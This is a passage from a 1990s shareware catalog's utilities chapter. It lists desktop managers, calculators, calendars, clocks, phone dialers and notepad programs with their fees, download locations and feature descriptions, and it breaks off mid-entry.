+ (see page 6); discounts on upgrades. + Look for: SWD12.ZIP on BBSs (call 714-376-9240 to download it at + no charge); SWD12.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 9 (or contact userID 71441,1637 for assistance). + SWREG#: 4130 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Brings the true, proven, folder/document look & feel to Windows + 3.1! SWDesktop gives you long filename, trascan(delayed) and + immediate delete, icon and text file/directory views, a file + finder, history of recently used files/programs, zip file + access, full drag/drop between apps, file aliases, and more! + Add your favorite apps on a convenient drop-down menu for quick + access. Easy to install and use. Upgrade your Windows without + expensive hardware changes. + + + Product: WinAlter + Alter file date, time, & attribs in Windows. See full + description on page 28. + + Product: WinCap+ + Powerful Windows(3.1) screen capture utility. See full + description on page 507. + + Product: Winvelope + Envelope printing utility for Windows. See full description on + page 83. + + 2.6.1 Multi-function + + Product: ABcmd + Handy, easy to use, Windows command line. See full description + on page 90. + + Chapter 2, "Utilities" 114 + + + + Product: AMF Daily Planner & P.I.M. + Author: AMF (Andrew M. Freeman) + Version: 6.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $29.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: WPIM32.ZIP on BBSs; WPIM32.ZIP on CompuServe in + CIS:WUGNET forum LIBrary 10 (or contact userID 74250,1700 for + assistance). + SWREG#: 3409 + PsL#: 11789 + Download size: 2650k (about 197 minutes with a 2400 baud modem) + Description: + This PIM is the easiest by far to use. Calendar and daily + planner/to-do list to the year 9000! Full desktop editor which + allows saves and openings. Phone book and address books store + up to 30,000 entries in a Rolodex look-alike dialog. No + clutter. Easy to use. Full drag & drop interface. Drag & drop + scheduling. Up to 64k data per day. Set up to 1440 alarms per + day. Automated dialing, WinFaxing, Mail Merges, scheduling, + envelope printing, business letter creation, and more! Now with + CallerID. + + + Product: Around The House + Complete personal/home information manager. See full + description on page 133. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 159. + + Product: clySmic Win32 Utilities + Author: clySmic Software + Version: 2.00 (11-15-95) + Needs: IBM 80386, Windows NT 3.5 or better. March 1993 beta (or + later) of Windows NT. + Registration fee: $14.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited CompuServe, mail support; 2-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; CLYSUTIL.ZIP on + CompuServe in CIS:WINNT forum LIBrary 0 (or contact userID + 76156,164 for assistance). + SWREG#: 442 + Download size: 154k (about twelve minutes with a 2400 baud modem) + Description: + Win32 Utilities for Win95, NT, Win32s. Native Win32 utilities: + PaperDrop (d'n'd wallpaper changer), ExeType (d'n'd EXE info + util to keep track of all the kinds of EXEs that now exist), + analog clock, controllable Random Wallpaper, File Manager Add- + + Chapter 2, "Utilities" 115 + + + + On (lots of features, has toolbar buttons), System Info, + GeneralDrop (make any prog d'n'd). + + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 134. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 135. + + Product: GTI Desktop+ + Author: GTI Ltd, +44-973-829351 + Version: 1.2 (10-11-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Strongly recommended: Mouse; sound card. + Registration fee: $40.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited mail support; bonus + data; bonus graphics; all ASP-wide offers (see page 6); + discounts on upgrades. + Look for: availability unknown on BBSs; GTIDSK12.ZIP on + CompuServe in CIS:WINAV forum LIBrary 20 (or contact userID + 100661,763 for assistance). + SWREG#: 6928 + Download size: 1369k (about 102 minutes with a 2400 baud modem) + Description: + A set of integrated utils includes screen savers, randomizer, + animated wallpaper, random wallpaper changer, custom cursors + and a random startup/exit sound changer. Shareware version + includes "Slide Show", a screen saver which allows you to turn + your favourite bitmap (or series of bitmaps) into a unique + personal screen saver. Also included "Classic Planes" photo + realistic scr saver. Also includes support for standard .SCR + screen savers. + + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 126. + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 34. + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 171. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 143. + + Chapter 2, "Utilities" 116 + + + + Product: WinDatCon + Author: Vogel Scientific Software + Version: 2.0 (04-18-94) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; Hard + disk; VBRUN300.DLL. + Registration fee: $25.00 (add $4.00 for shipping to Canadian + addresses) (add $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of CompuServe, mail support; + 3-month limited return policy; all ASP-wide offers (see + page 6). 6-month free upgrading allowed. + Look for: WDC20.ZIP on BBSs; WDC20.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 14 (or contact userID 71302,3436 for assistance). + SWREG#: 2492 + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + A Windows data conversion program for acceleration, angle, + area, energy, length, power, pressure, speed, temperature, + time, volume and weight. Has many unique features including + pop-up unit definitions, a leap year option, graphical angle + display, calculation of boiling points at specified pressures, + density calculations, and lists of SI prefixes and over 200 + boiling points and densities. A valuable tool for scientists + and students. + + + Product: XFile + Author: Phase 33 Digital, Inc. + Version: 2.00 (03-15-95) + Needs: IBM 80386, Windows 3.1 or better. + Strongly recommended: Hard disk; Mouse. + Registration fee: $18.95 + Registration benefits: 6 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. 1 free update disk(s) + sent out. May upgrade to Pro version rather than wait for next + release. + Look for: availability unknown on BBSs; XFILE.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 6 (or contact userID 73740,2412 + for assistance). + SWREG#: 5242 + PsL#: 11955 + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Low profile multifunctional desktop utility for Windows 3.1. + Features include drag-n-drop file/directory deletion, multi- + drive file finder, program launcher, timed program execution, + unlimited alarms, system resource monitor, free memory monitor, + quick Windows exit, and general system information. Optionally + displays date, time, resources, and free memory. + + Chapter 2, "Utilities" 117 + + + + Product: ZiPaper + Wallpaper changer uses PKZip to save space. See full + description on page 41. + + 2.6.2 Calculators + + See also: Spreadsheet applications; Mathematics; Finances, + Financial calculators; Business, Business utilities, Weights & + measurements. + + Product: CALC_JNC + Author: James N. Cox, 215-538-7363 + Version: 9.51 (02-20-93) + Needs: IBM PC, DOS 3.0 or better. 58k RAM. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, CompuServe, GEnie, + mail support; 2-month return policy; bonus utilities; all ASP- + wide offers (see page 6). 12-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: CALJNC95.SDN on BBSs (call 215-721-7039 to download it + at no charge); CALJNC.ZIP on CompuServe in CIS:PCPROG forum + LIBrary 6 (or contact userID 76665,3443 for assistance); + CALJNC.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID J.COX32 for assistance). + SWREG#: 187 + PsL#: 10738 + Download size: 64k (about five minutes with a 2400 baud modem) + Description: + Automatic conversions between decimal, hex, octal and binary. + Logical operations supported: not, and, nand, or, xor, nor, + neg, rol, ror, modulus. Entry of complex floating point + calculations supported. Logarithms, sin, cos, tan, hyperbolas, + time, fixed, decimal, pi, roots, factorials, and much more. + Other features: + * Load as a TSR + * Displayable memories + * Colors + * Moveable anywhere on screen + * On-line help + * Printer support + * Interactive manual + + + Product: Convert It!(tm) SE + Versatile unit of measure converter. See full description on + page 318. + + Chapter 2, "Utilities" 118 + + + + Product: FeeRate for Windows + Author: Tesserax Information Systems, 714.841.0616 + Version: 1.2 (10-19-95) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor. + VBRUN300.DLL. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $5.00 (add $2.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of phone, fax, CompuServe, mail support; 3-month limited + return policy; all ASP-wide offers (see page 6); discounts on + upgrades. 6-month free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 25k (about two minutes with a 2400 baud modem) + Description: + A professional's fee calculator. Using it, you can find the + hourly amount to charge clients in order to obtain a desired + yearly salary. Easy to use, just enter a few values and then + click on the "Calculate Fee" button to have FeeRate provide you + with an hourly fee rate. + + + Product: Home Refinancing + Compute time value savings from refinancing. See full + description on page 328. + + Product: Judy's TenKey + Author: Judy's Applications (Daniel E. Stickel), 408-244-0744 + Version: 3.0 (10-20-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.95 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $2.95 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of + CompuServe, mail support; 3-month return policy; bonus + utilities; discounts on other products. + Look for: 10KEY30.ZIP on BBSs; 10KEY.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 17 (or contact userID 70574,2247 for + assistance). + Download size: 188k (about 14 minutes with a 2400 baud modem) + Description: + Powerful Windows calculator with nearly every feature + imaginable, including ascrolling tape you can save, print, + resize, and even edit (causing the tape to automatically + recalculate); selectable syntax (normal, RPN, or tenkey adding + machine); financial dialogs; customizable display; keep on top + option; "Tip of the Day", and much more. You will never go + back to the default Windows calculator. + + Chapter 2, "Utilities" 119 + + + + 2.6.3 Calendars + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 133. + + Product: Ample Notice + Author: Granny's Old-Fashioned Software, 704-264-6906 + Version: 3.00 (07-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $30.00 + Registration benefits: Printed manual, master disks, future + update, support. + Look for: availability unknown on BBSs; AN300.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 7 (or contact userID 73577,230 for + assistance). + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + An appointments calendar/alarm clock package that can help + organize your life. You can easily record birthdays (with ages + updated each year), a meeting every other Tuesday at 4:00 for 5 + meetings, Father's Day (third Sunday in June), and many other + date patterns. + + Appointments automatically set a 'pop-up alarm clock'. + Printouts can be obtained in many styles for reference away + from your computer. Mouse support, help, menus, and + customization. + + + Product: BirthdayMinder + Author: Saturday*s Child (Froma Bessel), 516-671-3861 + Version: 1.0 (03-21-96) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, fax, + CompuServe, mail support; 1-month limited return policy; bonus + data; all ASP-wide offers (see page 6); discounts on upgrades. + 3-month free upgrading allowed. Bag of birthday goodies incl. + balloons and party favors. + Look for: availability unknown on BBSs; BDMIND.ZIP on CompuServe + in CIS:OAFORUM forum LIBrary 23 (or contact userID 72550,2752 + for assistance). + SWREG#: 10531 + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Description: + If you've ever been embarrassed by forgetting someone's + birthday or anniversary, you can now be reminded of upcoming + events every time you boot Windows. + + Chapter 2, "Utilities" 120 + + + + Select the amount of advance notice you want and + BirthdayMinder(tm) will alert you... and remember to alert you + in years to come as well. Fun program also shows celebrity + birthdays (claim them as your friends; after all, they're on + your list!) and ways in which each day is celebrated around the + world. + + + Product: clySmic Lunar Almanack + Moon's phase/place/times. See full description on page 511. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 134. + + Product: DARN! Don't Forget! + Events Reminder for Windows. See full description on page 135. + + Product: Dear Diary + Diary/daily journal. See full description on page 146. + + Product: Early Bird + Early Bird. See full description on page 144. + + Product: Family Calendar for Windows + Author: Command Line Software (Douglas East), 970-667-4566 + Version: 1.30 (04-18-95) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP DeskJet printer; HP LaserJet printer. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, fax, BBS, CompuServe, mail support; 1-month + return policy; bonus data; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 12-month bound calendar using + your data. + Look for: FAMCAL13.ZI on BBSs (call 970-663-5507 to download it + at no charge); FAMCAL.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 72673,357 for assistance). + SWREG#: 4198 + PsL#: 11735 + Download size: 232k (about 17 minutes with a 2400 baud modem) + Description: + Prints family oriented professional quality wall calendars. + Give calendars as annual gifts to family and friends. Make $$$ + yourself printing calendars for others. Also prints unique + (purse or pocket) "shopping list". Supports International date + formats and A4 paper size. Prints formatted and sorted events + list and blank data collection sheets. Supports laser and other + graphic printers, including most dot matrix printers. + + Chapter 2, "Utilities" 121 + + + + Product: Family Scheduler + Author: Madrigal Soft Tools Inc., 604-920-3910 + Version: 1.1 (09-24-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $19.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6); discounts on + upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs; FSCH1.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 7 (or contact userID 75357,1100 + for assistance). + SWREG#: 6525 + PsL#: 14220 + Download size: 537k (about 40 minutes with a 2400 baud modem) + Description: + Helps families stay organized and aware of each other's + activities and events. It merges the schedules of household + members to create shared or individual calendars that cover + everyone, one person, or some of the family. Calendars can be + for a day, a week, or a user defined period. Browse them on + screen or print them out. Schedule repeating events with one + entry, even those that occur irregularly. Schedule several + people at once. Automatically checks for conflicts with + schedules and special days. + + + Product: IPIN PhotoCalendar + Schedule your works with personalized photos. See full + description on page 139. + + Product: Lunar Taskbar Almanack + Author: clySmic Software + Version: 1.20 (11-30-95) + Needs: IBM 80386, Windows 95 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $9.95 + Registration benefits: 3 months of unlimited BBS, CompuServe, + mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; LUNABAR.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 76156,164 + for assistance). + SWREG#: 4090 + Download size: 402k (about 30 minutes with a 2400 baud modem) + Description: + An accurate Lunar Almanack for Win95's Taskbar. Places an icon + in Windows 95's taskbar displaying the current moon phase and + age. Click to open a full lunar almanack displaying lunar + phase; rising, southing, and setting times, the constellation & + signe of the moon, & more. Full Win95 install/uninstall. + + + Product: Mayan Calendar + Converts Mayan/modern calendar dates. See full description on + page 529. + + Chapter 2, "Utilities" 122 + + + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 152. + + Product: Personal Calendar (PC) + PIM appointment reminder, clock, calendar TSR. See full + description on page 140. + + Product: Personal Schedule + Author: Will Baldwin, 417-626-9109 + Version: 1.02 (04-20-95) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Mouse; math coprocessor. + Registration fee: $10.00 + Registration benefits: 31/2" master disk(s); 12 months of phone, + fax, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: PRSCD102.ZIP on BBSs. + SWREG#: 5471 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Calendar/schedule/project manager. Personal Schedule manages + personal, family, group, and project calendar schedules, + reminding when tasks are due, and automatically calculating due + dates for recurring tasks. It features both Interactive and + Batch modes. In batch mode (i.e. Autoexec.bat), it will scan + your schedule and pop up a window if it finds a current + uncompleted task. Ideal for work or home. No limit on # of + schedules that can be created. Pull-down menus, dialog boxes, + mouse control. + + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 143. + + Product: TC's Toolbox + Ten Windows programs, view files & lots more! See full + description on page 51. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 143. + + Product: x-CAL3 + Network calendar system. See full description on page 364. + + Product: Yellow Sticky for Windows 4.5 + Windows reminder program. See full description on page 145. + + Chapter 2, "Utilities" 123 + + + + 2.6.4 Clocks + + Product: Clickometer + Author: Sapphire Software Inc., 808-395-5587 + Version: 1.1 (11-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $15.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 12 months of unlimited phone, CompuServe, mail + support; 1-month return policy; discounts on upgrades. + Look for: CLKMTR11.ZIP on BBSs; CLKMTR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 71223,3653 for + assistance). + SWREG#: 3941 + PsL#: 11694 + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + Knowing when to take a break may help to reduce repetitive- + strain injuries (RSI). This utility counts keystrokes, mouse + clicks, and tracks mouse movement. It issues warning notices + when activity thresholds are exceeded. Real-time counters are + displayed like odometers. Reports show profiles of user input + activity. On-line help provided. Dynamic Link Library can be + used by your own programs. + + + Product: clySmic Win32 Utilities + Utils 4 Win32: clocks, wallpaper, recycler. See full + description on page 114. + + Product: Personal Calendar (PC) + PIM appointment reminder, clock, calendar TSR. See full + description on page 140. + + Chapter 2, "Utilities" 124 + + + + Product: PictureClock + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 1.00 (10-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer; + sound card. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: PICCLK??.ZIP on BBSs; PICCLK10.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 72330,1776 for + assistance). + SWREG#: 8461 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Windows floating alarm clock & drag-and-drop graphics file + viewer. Replacement for Windows clock with handy graphics + viewing capabilities. Can also preview .WAV files. Convenient + "quick hide" feature means clock never gets in your way. + Registered version features customizable alarm sound and + ability to print halftoned graphic images. + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 171. + + Product: Visual Calendar Planner + A desktop planner similar to office planner. See full + description on page 143. + + Product: World Clock + Author: Hard-Drive Software, +44-O1963-351470 + Version: 2.1 (04-08-96) + Needs: IBM 80386, Windows 3.1 or better. EGA monitor; Hard disk; + Mouse; VBRUN300.DLL. + Registration fee: L-6.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, fax, mail support; + 1-month return policy; all ASP-wide offers (see page 6). 1 + free update disk(s) sent out. + Look for: WRLDC21.ZIP on BBSs. + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Displays local time as well as two international times of your + choice, all three of which can be very easily changed, with + virtually instant readout. If two international times are not + enough, multiple instances of the program can be started to + + Chapter 2, "Utilities" 125 + + + + provide as many as you like, and will stay on top of all other + applications if requ'd. + + An easy method of setting the system clock and date is also + provided, and the current date is shown in the title bar. There + is also an alarm facility. + + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 116. + + 2.6.4.1 Precision timers + + Product: TC's Toolbox + Ten Windows programs, view files & lots more! See full + description on page 51. + + 2.6.5 Phone dialers + + See also: Communications, Call logging & analysis. + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 133. + + Product: Contact Browser + Author: Moore Software Solutions (Ric Moore), 619-672-1479 + Version: 2.5b (08-25-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; VGA monitor; + Hard disk; XMS memory. + Strongly recommended: SVGA monitor; HP DeskJet printer; HP + LaserJet printer; Hayes-compatible modem; Mouse; Epson printer. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + CompuServe, mail support; 3-month limited return policy; site + license; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; PHONE.ZIP on CompuServe + in CIS:WINPROD forum LIBrary 12 (or contact userID 72774,3705 + for assistance). + SWREG#: 5066 + Download size: 1277k (about 95 minutes with a 2400 baud modem) + Description: + Can be used at home or for business. Includes fields for names, + addresses, six phone numbers, special dates, E-Mail ID's, and + comments. Uses categories for grouping contacts for reports and + label printing. Unlimited number of entries, automatically + sorted. Searching, modem dialing, full featured customizable + reports and label printing, import/export, call histories, OLE + 2.0 and E-Mail capabilities. + + Chapter 2, "Utilities" 126 + + + + Product: Easydial + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 4.5 (01-22-93) + Needs: IBM PC, DOS 2.0 or better. CGA monitor; Hercules monitor; + Hard disk; Modem. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: ED45.ZIP on BBSs (call 909-352-2825 to download it at + no charge); ED45.ZIP on CompuServe in CIS:PCCOM forum LIBrary 2 + (or contact userID 76347,2477 for assistance); ED45.ZIP on + GEnie in IBMPC-615 forum LIBrary 6 (or contact userID PATRISOFT + for assistance). + Download size: 74k (about six minutes with a 2400 baud modem) + Description: + Dial your phone with your modem quickly and easily. Quick to + master; one of the best dialers available. You may log and time + calls, make difficult credit card calls, and even ignore a + certain area code. Great for turning call forwarding on/off, + contacting pagers and more! The dialer that you have been + looking for! + + + Product: Folders + Personal information manager network email. See full + description on page 138. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 151. + + Product: Link + Connects program to callback service. See full description on + page 356. + + Chapter 2, "Utilities" 127 + + + + Product: Little Black Book + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 3.0 (10-25-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Modem; Mouse. + Registration fee: $19.00 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: LBB.ZIP on BBSs (call 201-886-8048 to download it at no + charge); LBB.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 (or + contact userID 76336,3271 for assistance). + SWREG#: 3202 + PsL#: 11661 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + A popular favorite. It allows users to store names, addresses, + phone numbers, and up to 64K of notes per record. Includes + print and print-preview features as well as a full-featured on- + line context sensitive Windows help system. Also has an + intuitive toolbar interface in addition to the standard menu + structure interface. Data is created in MS-Access 2.0 format + for easy portability to other popular applications. + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 334. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 290. + + Product: PCFDial + Author: Barn Owl Software, 618-632-7345 + Version: 1.05 (05-26-92) + Needs: IBM PC, DOS 2.0 or better. 7k RAM; Hard disk; Hayes- + compatible modem. + Registration fee: $19.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 12 months of unlimited + phone, fax, CompuServe, newsletter, mail support; 1-month + return policy; all ASP-wide offers (see page 6); discounts on + other products. + Look for: PCFD-105.ZIP on BBSs (call 618-632-2339 to download it + at no charge); PCFDIL.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 74017,1344 for assistance); + + Chapter 2, "Utilities" 128 + + + + PCFD-103.ZIP on GEnie in IBMPC forum LIBrary 0 (or contact + userID R.ROSENBERGE for assistance). + SWREG#: 835 + PsL#: 10362 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Awards & nominations: 1991 winner, Public Brand Software + contests for useful programs. + Description: + This 7k swapping TSR dials voice phone numbers displayed by + other programs (such as database software). Can dial "vanity" + numbers like 800-IBM-DISK or numbers split apart on separate + lines. Keeps a log of calls and displays the local time for + each area code. Pops up at regular intervals to let you know + how long you've talked (useful for salesmen who must "close the + deal" in a set amount of time). Context sensitive help. + + + Product: TC's Toolbox + Ten Windows programs, view files & lots more! See full + description on page 51. + + 2.6.5.1 Rolodex programs + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 299. + + Product: FF Business Cards + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.0 (12-08-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + HP DeskJet printer; HP LaserJet printer; Postscript printer; + Mouse. Laser printer capable of single-sheet feeds. + Registration fee: $19.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus graphics; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Look for: FFBCRD.ZIP on BBSs; FFBCRD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 7 (or contact userID 72103,505 for + assistance). + Download size: 349k (about 26 minutes with a 2400 baud modem) + Description: + Features a "drag and drop" interface allowing you to create + stunning business and rotary (rolodex) cards and then print + them on your printer. You can place text, pictures, lines and + rectangles. Use all your fonts and bitmaps! Links to + Paintbrush to edit/create picture images. Many examples + included to get you started quickly. Use it to print coupons, + appointment cards, tickets, anything you would want to print on + a card! + + Chapter 2, "Utilities" 129 + + + + Product: IPIN PhotoCalendar + Schedule your works with personalized photos. See full + description on page 139. + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 140. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 234. + + Product: PSA Cards for Windows 3.1 + An easy to use personal information manager. See full + description on page 141. + + Product: PSA Cards for Windows 95/NT + An easy to use personal information manager. See full + description on page 142. + + Product: Rolodeck + Author: Henning Associates (Michael R. Henning), 804-295-0554 + Version: 1.0 (05-03-95) + Needs: IBM AT (80286), Windows 3.1 or better. 70k RAM. + Strongly recommended: VGA monitor; Hard disk; Mouse. + Registration fee: $8.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: availability unknown on BBSs; ROLO10.ZIP on CompuServe + in CIS:WINSHAR forum LIBrary 0 (or contact userID 72176,2507 + for assistance). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Puts your desktop rolodex into Windows. Alphabet bar allows + quick access through out your file. Page curls allow changing + pages by clicking the mouse. + + + Product: TC's Personal Data Manager + Keep track of addresses and phone numbers. See full + description on page 143. + + Product: x-CON3 + Network contacts management system. See full description on + page 364. + + Product: x-FONE3 + Network phone directory system. See full description on + page 365. + + Chapter 2, "Utilities" 130 + + + + Product: x-FONE4 + Network phone directory system for Windows. See full + description on page 366. + + 2.6.6 Alarms + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 133. + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 119. + + Product: Clickometer + Warns when keybd/mouse activity exceed limits. See full + description on page 123. + + Product: Early Bird + Early Bird. See full description on page 144. + + Product: IPIN PhotoCalendar + Schedule your works with personalized photos. See full + description on page 139. + + Product: Personal Calendar (PC) + PIM appointment reminder, clock, calendar TSR. See full + description on page 140. + + Product: PSA Cards for Windows 3.1 + An easy to use personal information manager. See full + description on page 141. + + Product: PSA Cards for Windows 95/NT + An easy to use personal information manager. See full + description on page 142. + + Product: World Clock + Displays multiple time zones on your desktop. See full + description on page 124. + + Product: XFile + Multifunction desktop utility for Windows. See full + description on page 116. + + 2.6.7 Notepads + + Product: BOXER/DOS Text Editor + Full-featured text editor/word processor. See full description + on page 175. + + Product: BOXER/OS2 Text Editor + Full-featured text editor/word processor. See full description + on page 176. + + Chapter 2, "Utilities" 131 + + + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 134. + + Product: ClipMate for Windows + Clipboard utility - holds multiple items. See full description + on page 167. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 182. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 134. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 229. + + Product: MEGA EDIT Editor for Windows + Text editor for large files. See full description on page 178. + + Product: Postit for Windows + Author: Henning Associates (Michael R. Henning), 804-295-0554 + Version: 3.04 (04-30-96) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $11.95 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $3.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: 